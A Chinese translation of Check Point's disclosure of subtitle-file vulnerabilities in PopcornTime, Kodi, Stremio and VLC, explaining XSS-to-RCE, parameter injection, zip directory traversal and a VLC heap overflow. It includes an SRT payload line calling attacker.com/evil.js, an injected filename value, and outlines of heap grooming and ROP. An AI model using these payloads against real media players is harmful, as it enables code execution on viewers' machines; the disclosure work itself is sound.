看著電影電腦怎麼就被黑了?給你技術細節分析

前言

最近CheckPoint公司的研究人員對一種全新的攻擊方式——字幕攻擊,進行了一個全面研究。其實說起字幕攻擊,研究人員嘶吼編輯組曾在今年5月進行過相關的跟蹤研究,並對攻擊者如何使用字幕文件來控制用戶設備而不會被檢測進行了分析,詳情請點擊《新型字幕攻擊:多款播放器遠程命令執行,全球約2億用戶受影響》。

字幕攻擊目前已在許多流行的媒體平台開始傳播,包括VLC、Kodi (XBMC)、Popcorn-Time和Stremio等播放器都存在該漏洞。攻擊者利用該漏洞,可以從事竊取敏感信息,安裝勒索軟體,組織大規模DDoS等多種攻擊。由於這些漏洞是固定的,所以CheckPoint的研究人員得以對這些漏洞的攻擊技術細節進行全方位的研究。

PopcornTime

作為一個開源項目在短短几個星期內開發的多平台「Netflix for pirates」將一個Torrent客戶端,視頻播放器和無休止的擦除功能的攻擊組合集成在一個看似非常友好的圖形用戶界面下。

PopcornTime的觀影網站嘗試通過盜版BitTorrent資源向用戶發布更多電影內容,並承諾可帶來Netflix式的體驗,。儘管直觀的用戶界面贏得了廣泛讚揚,但因版權問題自誕生之日起就風波不斷,目前PopcornTime的觀影網站已經關閉。

PopcornTime應用程序停止運行後,被各種不同的組織接管,以維護程序並開發新功能。而最初的PopcornTime項目的成員宣布他們繼續負責popcorntime.io(已轉變為popcorntime.sh)項目的運營。

Webkit節目介面包含電影信息和元數據,它提供預告片,影片摘要,投放信息,封面照片,IMDB評級等等。

PopcornTime中的字幕

為了使用戶的觀影體驗更好,PopcornTime會支持自動獲取字幕的功能,而黑客也是利用此功能對用戶進行攻擊。在後台的處理程序中,PopcornTime使用開放字幕作為其唯一的字幕來源。PopcornTime目前擁有超過四百萬個條目和非常方便的API,是非常受歡迎的存儲庫。

該API不僅可以方便地搜索和下載字幕,而且還有一個推薦演算法可以幫助用戶找到適合他們的電影和發行的字幕文件。

攻擊分析

如上所述,PopcornTime是基於webkit的,準確的叫法是NW.js,以前稱為node-webkit,NW.js平台允許開發人員在其本機應用程序中使用HTML5,CSS3和WebGL等Web技術。

此外,Node.js API和第三方模塊可以直接從DOM調用。本質上,一個NW.js應用程序是執行各種操作的網頁,所有代碼都是用JavaScript或HTML編寫的,並且用CSS格式化。像任何網頁一樣,它可能容易受到XSS攻擊。在這種情況下,由於它運行在節點js引擎上,因此XSS允許使用伺服器端功能。換句話說,XSS實際上是RCE。

一旦用戶開始播放電影,攻擊也就開始了。

PopcornTime使用之前提到的API發出查詢,並下載推薦的字幕(稍後研究人員將深入了解該過程,因為它是攻擊的關鍵步驟)。

接下來,PopcornTime嘗試將文件轉碼為.srt格式,下圖就是 /src/app/vendor/videojshooks.js:

在各種解碼和解析功能之後,使用「cues」數組在正確的時間將創建的元素(單個字幕)附加到顯示器上,下圖就是updateDisplay函數():

這使研究人員能夠將任何html對象添加到顯示器上。顯然,完全控制任何HTML元素本身是危險的。然而,當處理基於節點的應用程序時,了解XSS等於RCE是很重要的。可以使用諸如child_process之類的模塊輕鬆執行系統命令。一旦研究人員的未經批准的JavaScript被載入到顯示器,就會有幾行代碼被執行。

一個基本的SRT文件看起來像這樣:

1n00:00:01,000 –> 00:00:05,000nHello Worldn

研究人員可以使用HTML標籤,而不是「Hello World」的「圖片」標籤。嘗試載入一個不存在的圖像,並為其提供onerror屬性,以下是malicious.srt示例和evil.js(命令執行):

如malicious.srt示例所示,研究人員使用onerror屬性JavaScript功能來刪除損壞圖像的顯示圖標,並將研究人員的惡意遠程有效載荷附加到頁面。而且,evil.js也將彈出傳統的calc.exe。

惡意攻擊的源頭——OpenSubtitles

所以研究人員可以在PopcornTime上執行代碼,雖然客戶端漏洞是有價值的,但它們往往依賴於一些用戶交互。為了成功開發,必須點擊鏈接,必須閱讀pdf,或者網站需要被黑客入侵。研究人員都知道,互聯網上的開放社區會不小心讀取字幕,並被視為無害的文本文件,所以研究人員證明這些文件可能是危險的。

OpenSubtitles擁有超過四百萬個條目,平均每天下載量為五百萬,是字幕最大的在線社區。其廣泛的API也被廣泛地集成到許多其他視頻播放器中,他們甚至提供智能搜索功能,這是一個鏈接功能,根據用戶提供的信息返回最佳匹配字幕。研究人員可以操縱此API以去除任何用戶交互,並確保存儲在OpenSubtitles上的惡意字幕被自動下載。

當用戶開始播放電影時,API立即發送SearchSubtitles請求,導出包含符合研究人員的條件(IMDBid)的所有字幕對象的XML,下圖是API SearchSubtitles請求圖以及API SearchSubtitles響應:

在API SearchSubtitles請求圖中,研究人員看到搜索條件為「imdbid」,在API SearchSubtitles響應圖中的響應包含由imdbid匹配的所有字幕。因為API具有基於其文件名,IMDBid,上傳者等級等等的字幕的演算法。仔細閱讀文檔,研究人員發現了以下的排名方法:

在上圖中,研究人員看到基於如:標籤,IMDBid,上傳用戶等的匹配標準。根據匹配的標準,假設研究人員(如「user | anon」)將其自定義的惡意字幕上傳到OpenSubtitles,可以看到該字幕只會得到5分。但是在這裡研究人員學到了一個有價值的教訓,僅僅閱讀文檔是不夠的,因為源代碼揭示了一個非法行為。

matchTag函數,下圖是opensub-api排名演算法:

PopcornTime發送的請求僅指定IMDBid,這意味著MatchedBy ===tag的條件將永遠為false。

這被稱作調用函數matchTags():

matchTags函數會將影片的文件名和標題分拆分。

標籤基本上是文件名中發現的獨立字或數字,通常用點 (「.」) 和破折號 (「-「)分隔。而電影文件名和字幕文件名之間的共享標籤數量需要除以電影標籤的數量,乘以最大值7,這是在兩個文件名完全兼容的情況下可以分配的最大值 。

例如,如果電影文件名為「Trolls.2016.BDRip.x264- [YTS.AG] .mp4」,則標籤如下:

[Trolls,2016,BDRip,x264,YTS,AG,mp4]n

作為應用程序(例如PopcornTime)下載的電影文件名的名稱可以很容易地被發現(通過使用嗅探器),研究人員可以確保研究的字幕文件具有完全相同的名稱,但以「srt」擴展名結尾會有獎勵字幕排名與額外的7分。

把它們放在一起,研究人員認為他們上傳的字母可以達到12分的評級。其中IMDBid的匹配是微不足道的(+5),並且知道torrent網站和PopcornTime使用的具體版本與打開數據包嗅探器一樣簡單。所以研究人員可以使惡意字幕導致完全兼容(+7)。

雖然這是一個相當不錯的評級分數,但研究人員仍然不滿意。

因為播放器推薦的字幕都是一些最受歡迎的內容比如,斯諾登,死亡等:

上圖顯示了世界上最流行的7種語言的得分,並顯示其平均和最高分。通過一系列流行的字幕自動清理,研究人員注意到,字幕得到的最高分是14,而平均值約為10。再次回顧評分系統,研究人員意識到其實字幕評分是可以很容易地上升的。

所以研究人員在OpenSubtitles註冊了一個賬戶,還有一個4分40秒的Python,以下就是研究人員的新用戶排名。

研究人員寫了一個小腳本,顯示給定電影的所有可用字幕。在下圖中,你可以看到研究人員的字幕得分最高為15,以下就是研究人員自定義的惡意字幕排名第一的截圖:

這意味著,研究人員可以強制用戶載入研究人員製作的惡意字幕。

KODI

Kodi (原名 XBMC) 是一款經典免費開源、跨平台且極其強大專業的多媒體影音中心軟體播放器,包含了專業的影音內容管理以及解碼播放功能一體,提供適合在電視、投影、大屏幕上顯示的全屏界面,無線手機遙控操作方式,以及功能相當豐富的插件擴展,絕對是打造家庭影院和私人電影庫的必備神器。可用於所有主要平台(Windows,Linux,Mac,iOS和Android),72種語言,超過4000萬人使用,是最常用的Media Center軟體。 KODI也是智能電視和Raspberry-Pis的熱門組合。

KODI的字幕

像許多其他KODI功能一樣,字幕由Python插件管理。最常見的字幕插件是開放字幕,而且研究人員已經熟悉了他們的API,所以就可以直接進入字幕下載過程。插件使用以下函數搜索字幕:

searchsubtitles()從OpenSubtitles中檢索字幕列表,包括其元數據。用一個for循環遍歷這些字幕,並使用addDirectoryItem()將它們添加到顯示器中,如下所示就是「Snowden」電影的印尼語字幕:

如上圖所示,發送到addDirectoryItem()的字元串是:

plugin://%s/?action=download&link=%s&ID=%s&filename=%s&format=%sn

由於Open-Subtit是開源的,攻擊者可以控制SubFileName值下接收的filename參數,如下所示地API響應。

鑒於文件名完全由攻擊者控制,也可以通過上傳一個Subtitles.srt&link=<controlled>&ID=<controlled>。

這會導致以下字元串:

plugin://%s/?action=download&link=%s&ID=%s&filename=Subtitles.srt&link=<controlled>&ID=<controlled>&format=%sn

由於在解析字元串時使用基本的分割函數,因此可以進行此覆蓋。這些篡改的參數對於在用戶選擇的字幕菜單後的運行函數至關重要。一旦用戶從字幕菜單中選擇了一個字幕,就會發送到Download():

現在研究人員就控制了傳遞給它的所有參數,並濫用這些功能。通過提供無效的ID(如「-1」),研究人員到達「if not result」分支。該分支應該下載原始檔案,以防Open-Subtitles API無法獲取必要的文件。

通過使用url參數,研究人員可以下載他們所希望的任何zip文件,如attacker.com/evil.zip。用戶可能會從互聯網不小心下載任意的zip檔案,但是用KODI的內置漏洞來鏈接下載任意的zip檔案會使其產生攻擊行為。通過分析ExtractArchive(),研究人員注意到它將strPath(提取目標路徑)連接到strFilePath(歸檔中的文件路徑,由迭代器生成)。

創建包含名為「..」的文件夾的zip可以遞歸到允許研究人員控制提取目標路徑(CVE-2017-8314)。

使用這個目錄遍歷漏洞,研究人員可以覆蓋KODI的字幕插件,下圖就是惡意ZIP文件結構。

覆蓋插件意味著KODI將很快執行研究人員的文件,研究人員的惡意Python代碼可能與原始插件完全重複,並增加了任何所需的惡意行為。

Stremio

PopcornTime絕對標誌著流媒體應用的興起,不過隨著它的停運,用戶就不得不尋找替代品。

Stremio是一個半開源內容聚合器,像PopcornTime一樣,它的設計易於使用,並具有類似的用戶界面。有趣的是,Stremio與PopcornTime共享了一些引擎的特點。最重要的是對於研究人員來說,它是一個基於網路套件的應用程序,它使用Opensubtitle.org作為其字幕提供程序。

Strem.IO還將字幕內容添加到webkit界面,所以研究人員認為XSS也是一個很好的方向。但是,嘗試使用與PopcornTime相同的分析技術卻失敗了:

研究人員可以在底部看到被損壞的圖像,但是卻沒有執行任何代碼。顯然,研究人員的JavaScript已被凈化。

Stremio代碼被歸檔為一個ASAR文件,一種簡單的TAR格式,將所有文件連接在一起,無需壓縮。提取源代碼並進行美化,研究人員意識到,添加到屏幕的任何文本都通過了Angular-Sanitize。凈化服務將解析HTML,即只允許安全和白名單的標記和屬性生運行,從而對字元串進行凈化,因此不包含腳本表達式或危險屬性。被強制使用靜態HTML標籤沒有腳本功能真的限制了研究人員的分析。

如果你曾使用過Stremio,可能熟悉其「支持研究人員」的彈窗。

使用HTML <img>標籤,研究人員能夠在屏幕中間顯示該彈窗的精確副本。使用<a href>標籤包裝,意味著點擊關閉按鈕會將此網路套件實例重定向到研究人員的未經批准的頁面:

1n00:00:01,000 –> 00:01:00,000n<a href=」http://attacker.com/evil.js」><img src=」http://attacker.com/support.jpg」></a>n

該頁面與PopcornTime攻擊中的evil.js完全相同,它利用nodejs功能在受害者的設備上執行代碼。

VLC

研究人員已經意識到字幕作為攻擊媒介的災難性危害,目前光VLC就擁有超過1.8億用戶,是最受歡迎的媒體播放器之一。這種開放源代碼的攜帶型跨平台媒體播放器可用於幾乎任何可以目前的平台:Windows,OS X,Linux,Windows Phone,Android,Tizen和iOS。研究人員確信與此相關的字幕相關漏洞也存在。

事實上,VLC是一個完整的多媒體框架,如DirectShow或GStreamer,你可以在其中動態載入和插入許多模塊。核心框架從輸入(文件,網路流)到輸出(音頻或視頻,屏幕或網路)都會進行媒體處理。它使用模塊在每個階段完成大部分工作,比如各種分離器,解碼器,濾波器和輸出。

以下是VLC中實現的主要模塊功能的圖表:

在研究人員的研究中,研究人員遇到了超過25個字幕格式。其中一些是二進位的,一些是文本的,只有少數文檔。

雖然SRT支持一組有限的HTML標籤和屬性,但是研究人員非常驚訝地了解了各種格式提供的其他異域功能。例如,SAMI字幕允許嵌入圖像,SSA支持多個主題或樣式的定義,然後從每個字幕引用它們, ASS甚至允許二進位字體嵌入,通常沒有任何庫可以解析這些格式。

返回VLC

文字字幕由VLC在其解碼器中解析為subtitle.c。以下是它支持的所有格式及其解析函數:

解碼器的唯一工作是解析每種格式的不同定時約定,並將每個字幕發送到其解碼器。除了由開源庫libass解碼的SSA和ASS之外,所有這些格式都被發送到VLC自己的解碼器subsdec.c。

subsdec.c會解析每個字幕的文本欄位,並創建它的兩個版本。第一個是一個純文本版本,所有標籤,屬性和樣式都被刪除。第二個是功能更豐富的版本被稱為HTMLsubtitle, HTML字幕包含所有樣式屬性,如字體,對齊等。字幕解碼後,字幕會發送到渲染的最後階段,文本渲染大多是使用freetype庫完成的。

漏洞的尋找

在VLC字幕相關代碼中,研究人員很快注意到使用原始指針而不是內置字元串函數完成了大量解析。這通常是一個壞主意。例如,在分析字體標籤(例如系列,大小或顏色)的可能屬性的同時,VLC無法在某些地方驗證字元串的結尾。解碼器將繼續從緩衝區讀取,直到滿足>,然後跳過任何Null終結符。 (CVE-2017-8310)

Fuzzing

在手動審核代碼時,研究人員也開始對字幕相關漏洞進行VLC的拼接。

研究人員選擇的工具是AFL,AFL號稱是當前最高級的Fuzzing測試工具之一。由lcamtuf所開發。通過對源碼進行重新編譯時進行插樁(簡稱編譯時插樁)的方式自動產生測試用例來探索二進位程序內部新的執行路徑。與其他基於插樁技術的fuzzers相比,afl-fuzz具有較低的性能消耗,有各種高效的fuzzing策略和tricks最小化技巧, 不需要先行複雜的配置,能無縫處理複雜的現實中的程序。當然AFL也支持直接對沒有源碼的二進位程序進行測試,但需要QEMU的支持。

對於研究人員的語料庫來說,他們可以以各種格式下載並重寫了不同功能的幾個字幕文件。為了避免渲染和顯示視頻,研究人員使用轉碼功能將一個只包含黑屏的短片轉換成另一個編解碼器。

以下是研究人員用來運行AFL的命令:

./afl-fuzz –t 600000 –m 2048 –i input/ -o output/ –S 「fuzzer$(date +%s)」 -x subtitles.dict — ~/sources/vlc-2.2-afl/bin/vlc-static –q –I dummy –subfilen@@ -sout=『#transcode{vcodec=「x264」,soverlay=「true」}:standard{access=」file」,mux=」avi」,dst=」/dev/null」}』 ./input.mp4 vlc://quitn

通過使用AFL才找到一個帶有漏洞的函數:ParseJSS。 JSS,代表JACO子腳本文件。 JACOsub是一種非常靈活的格式,允許定時操作,包含外部JACOsub文件,時鐘暫停等。JACO腳本嚴重依賴指令,一個指令是一系列在一起的字元代碼串。用這些字元串來確定一個副標題的位置,字體,樣式,顏色等等。AFL發現的崩潰是由於在嘗試跳過不受支持的指令——CVE-2017-8313時的外接讀取。

如果在沒有任何後續空格的情況下寫入指令,則此while循環將跳過Null位元組,結束psz_text超過運行緩衝區。在整個代碼中,psz_text是一個指向堆上分配的Null終止字元串的指針。

這引起了研究人員對ParseJSS函數的關注,研究人員很快在解析其他指令時手動發現了另外兩個超出限制的讀取漏洞。這次是分析轉移和時間指令(分別為S和T)的解析,這是由於移位可能大於psz_text長度(CVE-2017-8312)。

雖然攻擊者可以利用上述的VLC漏洞使程序崩潰,但對研究人員來說的分析還不夠。研究人員在代碼執行之後,還需要一個漏洞,達到編寫一些數據的目的。通過繼續閱讀ParseJSS函數,並查看其他指令,研究人員發現C[olor]和F[ont]指令可以提供更強大的原語。由於雙增量(double increment)有誤,研究人員可以跳過分隔空位元組並寫入緩衝區外。這種基於堆的溢出允許研究人員最終執行任意代碼(CVE-2017-8311)。

在另一種情況下,VLC INTENTIONALLY SKIPS THE NULL BYTE(行1883)也會導致堆緩衝區溢出。

漏洞攻擊過程

由於VLC支持許多平台的操作系統和硬體架構,且每個平台都可能利用一些不同的特徵和堆實現攻擊。從指針大小到緩存,一切都很重要。

在研究人員的PoC中,他們利用Ubuntu 16.04 x86_64。有了堆的開源實現,研究人員可以非常詳細地解釋和理解開發過程。通過使用GLIBC-malloc,得到少量的通用堆技術。但是,發生此漏洞的條件阻止研究人員使用些方法。所以研究人員唯一的選擇是使用該漏洞作為寫入原語來覆蓋某些特定的應用程序數據,這種覆蓋的數據反過來又會導致更強大的原語或完全控制代碼執行。

VLC是一個高度線程化的應用程序,借用堆的實現,每個線程都有自己的堆技術。這限制了研究人員可能覆蓋的對象的數量即只有在處理字幕的線程中分配的對象。而且,研究人員更有可能溢出一個在用於觸發漏洞的代碼附近分配的對象。

由於研究人員創建的線程代碼和攻擊函數不是太長,所以他們決定手動開始尋找有用的對象。研究人員想出了demux_sys_t和variable_t。此外,通過自動跟蹤堆上的每個分配的對象,研究人員還發現了link_map,es_out_id_t和一些在其中具有虛擬表的Qt對象。最終研究人員認為攻擊者會利用variable_t攻擊用戶,以下是variable_t的結構

該對象用於在VLC應用程序中保存變數類型的數據,包括模塊的配置值和命令行選項。像這樣的對象有很多,這就增加了研究人員操縱堆的機會,其中在一個堆之前有一個空位。 variable_t struct有一個p_ops欄位,它保存了一個指向操作變數值的函數指針的指針。控制此欄位可使攻擊者獲得對該程序的控制,而其他對象則不可以利用這個欄位或利用時有太多限制。

現在研究人員就有了一個受害對象,為了確保他們可以在受害者觀看影片之前分配一個JACOSubScript(JSS)字幕。這個操縱堆的過程必須處於一個可預測和隨時可用的狀態,稱為Heap Feng Shui 或Heap-Fu 或Grooming。幸運的是,研究人員很幸運在受害對象使用之前找到一個漏洞,「_」sub-fps「的variable_t。

譯者註:Heap Feng Shui就是利用漏洞進行任意代碼執行的技術,該技術嘗試通過仔細選擇的大小進行堆分配來操縱堆的布局。 它以風水命名,這是一種古老的中國美學體系,涉及到空間精確對齊的選擇。

儘管研究人員沒有使用任何其他的堆成形原型,但他們確實發現了一個非常有趣的代碼流。當打開字幕文件時,VLC不存在用於解析新文件的模塊。因為 VLC的架構非常模塊化,當解析文件時,它會查看所有的模塊(庫),載入它們並檢查是否知道如何解析給定的流(在本例中為文件)。易受攻擊的代碼駐留在字幕模塊中,但不是第一個模塊載入。兩個模塊之前,VobSub模塊被載入並檢查字幕是否是VobSub格式。研究人員可以欺騙這個模塊,讓它誤以為研究人員的文件實際上是一個VobSub文件,將VobSub魔術常量放在第一行。然後,該模塊開始解析文件,進行各種分配和取消分配。此代碼在分配受害對象之前運行,所以這個VobSub / JSS自動語言識別可以用於Heap Feng Shui。

該漏洞使研究人員能夠在分配的字幕串之後逐步地覆蓋數據,不過這需要解決一個主要問題,variable_t struct的第一個欄位是psz_name,它被假定為一個指向字元串的指針。該指針會在VLC的整個使用周期中被解除引用幾次。由於ParseJSS函數複製字元串,研究人員不能寫入NULL位元組,它是有效指針的前兩個位元組。因此,研究人員無法寫入有效的指針,並且不能溢出到variable_t struct中。為了解決這個問題,研究人員會在堆的元數據上做些手腳。研究人員使用了一系列複雜的分配溢出取代分配序列,並且覆蓋了Chunked編碼的元數據。這使研究人員能夠覆蓋variable_t結構中的p_ops欄位,而不會覆蓋psz_name欄位。

現在研究人員發現自己面臨著一個大問題,即應該寫什麼呢?在關閉VLC時,在Destroy函數中使用p_ops欄位。該代碼調用該欄位指向的數組中的pf_free函數,並將該值作為參數傳遞。所以研究人員需要指向研究人員的第一個小工具(實際上是16個位元組之前)的指針。研究人員這裡的主要問題是ASLR,解決這個問題的第一個辦法就是部分覆蓋。原始指針指向libvlccore庫中的float_ops靜態數組。研究人員可以部分覆蓋此值,並將其指向此庫中的其他位置。

第二個辦法就是找出在ubuntu中不是隨機化的主要二進位文件,研究人員在主要二進位文件中發現了一些非常有趣的小工具。例如,一個調用dlysm的小工具,然後使用另一個寄存器作為第一個參數調用結果(代碼為:dlsym(-1,$ rsi)($ rbx)))。

第三個方法是進行部分複製,由於研究人員的漏洞是從一個塊邊界之外複製過來的,所以他們可以操縱堆在塊中寫一個堆指針,然後部分地複製它。

不過研究人員並沒有使用這三種常規的辦法,因為無腳本的開發帶來了許多挑戰。通過禁用ASLR以及指向研究人員的堆,地址有所改變,很可能取決於線程的行為,但在統計時,可以假設它在某個地址中。研究人員的下一個問題是,應該在哪裡顯示? VLC逐行讀取字幕文件,並將每行複製到堆上的塊。低級線(low-level line)讀取機制對204800位元組的行大小會構成合成限制。

研究人員將數據放在所能允許的最長行中,並找出統計數據。通過建立了一個基於ROP鏈的libvlccore,研究人員可以粗略地將p_ops欄位指向他們的所能允許的最長行中,並用自定義的字幕文件啟動VLC。如此一來,一個gnome-calculator就彈了出來。

總結

研究人員表示,目前可以通過媒體播放平台中的各種漏洞,對用戶發起攻擊。漏洞類型可以是簡單的XSS,也可以是邏輯錯誤和內存損壞。

由於目前的媒體播放器多種多樣,所以攻擊方式也就多種多樣,可能會影響到數億用戶。通過本文的分析,可以肯定的是,網路攻擊無處不在,即使是那些我們認為最不可能的領域。總之一句話,只要是在系統上運行的所有程序都可能被黑客利用,鑒於此,我們將會繼續尋找這些不常見的攻擊行為,並為大家提供相應的解決方案。

本文翻譯自:Hacked in Translation – 「Director』s Cut」 - Full Technical Details | Check Point Blog,如若轉載,請註明來源於嘶吼: 看著電影電腦怎麼就被黑了?給你技術細節分析 更多內容請關注「嘶吼專業版」——Pro4hou

推薦閱讀:

微軟office漏洞再次被惡意利用,傳播惡意軟體
他用腳本存儲了兩百萬GB視頻,只是為了測試雲存儲是否真的「無限」
網路犯罪分子越來越擅長使用先進的身份驗證方法
移位溢註:告別依靠人品的偏移注入

TAG:信息安全 | 安全漏洞 |